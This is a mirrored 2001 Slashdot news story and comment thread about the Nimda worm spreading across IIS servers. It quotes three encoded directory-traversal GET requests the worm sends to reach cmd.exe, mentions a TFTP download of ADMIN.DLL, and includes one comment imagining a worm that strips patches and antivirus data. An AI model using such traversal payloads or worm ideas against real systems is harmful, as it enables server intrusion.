Slashdot Mirror

← Back to Stories (view on slashdot.org)

New (More) Annoying Microsoft Worm Hits Net

Posted by CmdrTaco on from the what-a-pain-in-the-arse dept.

A new worm seems to be running rampant Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am) I'm sure it'll keep moving to nearby boxes. Update: 09/18 16:40 GMT by J : It now has a name: "Nimda." More info here, here, and here.

Here are examples of the requests it's sending:

GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

7 of 1,163 comments (clear)

  1. This could explain why I can't reach my machine.. by Gambit+Thirty-Two · · Score: 1, Troll

    If its scanning subnets, this could very well explain why I cant reach my machine at home (Roadrunner).

    Its probably generation a sh*tload of traffic.

    Can anyone on 24.x.x.x verify?

  2. From what department? by EI-AOB · · Score: 0, Troll
    from the what-a-pain-in-the-arse dept.

    Arse? When did you move to England (or Ireland), Rob?

  3. Time for a class action lawsuit against Microsoft. by fmaxwell · · Score: 4, Troll

    Microsoft has cost ISPs, businesses, and end users an incalculable amount of money and frustration and it is all due to their negligence. They were negligent when they created software and technologies that are so easily exploited. They were negligent in their testing of their products. They were negligent in not sending patch CDs through the mail to registered users. If they can send you upgrade offers via the mail, they can send you patch CDs to repair their defective products.

    And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.

    I'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.

  4. Re:Is this just the old Unicode exploit? by DrSkwid · · Score: 0, Troll

    i have a better solution

    get 2 floppies

    make freebsd kernel & mfsroot disks from www.freebsd.org

    reboot your machine

    install freebsd

    simple, no more lame attacks from IIS machines

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  5. Re:Info FromRuss at BugTraq by Black+Parrot · · Score: 0, Troll


    > One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.

    > Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP.

    Ehrm, won't that take care of itself if you just leave your machine on the network for a while?

    --
    Sheesh, evil *and* a jerk. -- Jade
  6. Wormageddon? by Black+Parrot · · Score: 1, Troll


    > It's something new attacking something old. It looks to me like its trying a few of the old IIS vulnerabilities...

    Suppose someone wrote a worm that, whenever it managed to root a box, would undo the patches that finally killed off the famous worms of the past, and also remove the anti-virus software's data files.

    Since many of those worms/viruses are still lurking about at the level of background noise, they would suddenly find a vastly expanded niche and start attacking machines that had formerly been off limits to them.

    You could get a huge pile-up of worms and viruses all "re-released" simultaneously.

    --
    Sheesh, evil *and* a jerk. -- Jade
  7. Re:MS infected! by WildBeast · · Score: 0, Troll

    well what kind of a friend to you have?